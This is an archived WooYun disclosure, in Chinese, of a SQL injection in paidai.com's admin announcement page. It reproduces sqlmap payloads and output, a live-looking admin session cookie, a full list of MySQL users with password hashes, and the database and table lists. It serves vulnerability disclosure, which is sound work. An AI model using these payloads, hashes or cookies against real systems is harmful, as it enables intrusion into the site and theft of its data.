乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-11: 细节已通知厂商并且等待厂商处理中 2013-11-15: 厂商已经确认,细节仅向厂商公开 2013-11-25: 细节向核心白帽子及相关领域专家公开 2013-12-05: 细节向普通白帽子公开 2013-12-15: 细节向实习白帽子公开 2013-12-26: 细节向公众公开
哇哈哈哈哈哈哈
是个后台注射点,接着上次找到的任意登录漏洞,进入后台cookie(如果不能用就是过期了)
pai_check_report_interval=Mon%2C%2011%20Nov%202013%2012%3A46%3A21%20UTC; PHPSESSID=0psbkm1e56hf82qdnn1l8gdur0; bdshare_firstime=1384167347039; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; Hm_lvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731; Hm_lpvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731
注射点:http://www.paidai.com/admin/announcement.php?act=edit&ann_id=9
---Place: GETParameter: ann_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=edit&ann_id=9 AND 8157=8157 Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: act=edit&ann_id=-1171 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796d7a71,0x67664156676d4c6a5977,0x71776a7771),NULL#---
web application technology: PHP 5.3.8back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'paidai'
current user is DBA: True
同主机118用户,全服务器所有数据库沦陷(其中12个管理用户)
database management system users [12]:[*] 'backup'@'localhost'[*] 'cacti'@'localhost'[*] 'epaidai'@'%'[*] 'm_api_paidai'@'localhost'[*] 'paidaicom'@'localhost'[*] 'replication'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'localhost'[*] 'u02'@'192.168.0.2'[*] 'u03'@'192.168.0.3'[*] 'u04'@'192.168.0.4'[*] 'weipaishell'@'localhost'
SQL用户密码:
database management system users password hashes:[*] backup [1]: password hash: *D87050829EB02094C5C307278563AF7199DDED8F[*] cacti [1]: password hash: *9CDE1A09ED38FCFD4696D1AA82E4E1EE2F26270D[*] epaidai [1]: password hash: *7CFC397746A506C04BE9F973F03129017D816342[*] m_api_paidai [1]: password hash: *31371DE74CFF694701D115CE8D7A5A30628070D8[*] paidaicom [1]: password hash: *022A7CA5555E1CC1775E3EB618156F17B15C84A4[*] replication [1]: password hash: *27C496B116FBAD28EA871800EA4DBC0F1D539EF4[*] root [1]: password hash: *A24CF160387CC97807FB07D60333517509154FA3[*] u02 [1]: password hash: *666BADBE24C82DD924F4BE829BD156FF3B485FB4[*] u03 [1]: password hash: *666BADBE24C82DD924F4BE829BD156FF3B485FB4[*] u04 [1]: password hash: *5BA3E24CC3D212268EAB9C91E0D1235BEF5A93CC[*] weipaishell [1]: password hash: *C05A12A514871F6DD543947FDA3FE981BD4CB2F7
再查询了一下role,功能很多,权限特别大。来看看数据库列表
available databases [8]:[*] cacti[*] information_schema[*] mysql[*] paidai[*] paidai_weipai[*] test[*] wiki_hd[*] xweibo
表(太多了,不全贴了)
[20:56:00] [INFO] the SQL query used returns 245 entries[20:56:00] [INFO] retrieved: "e_accessstattab"[20:56:00] [INFO] retrieved: "e_activity"[20:56:01] [INFO] retrieved: "e_activity_leaveword"[20:56:01] [INFO] retrieved: "e_activity_old"[20:56:01] [INFO] retrieved: "e_activity_participants"[20:56:01] [INFO] retrieved: "e_activity_participants_old"[20:56:01] [INFO] retrieved: "e_activity_participants_trade"[20:56:01] [INFO] retrieved: "e_activity_poll"[20:56:02] [INFO] retrieved: "e_activity_topics"[20:56:02] [INFO] retrieved: "e_admin_privileges"[20:56:02] [INFO] retrieved: "e_android_stats_device"[20:56:02] [INFO] retrieved: "e_app_auth"[20:56:02] [INFO] retrieved: "e_app_client"[20:56:02] [INFO] retrieved: "e_app_client_history"[20:56:06] [INFO] retrieved: "e_app_client_uid"[20:56:06] [INFO] retrieved: "e_app_devicetoken"……
过滤啊
危害等级:高
漏洞Rank:15
确认时间:2013-11-15 16:05
尽快修复,谢谢测试。
暂无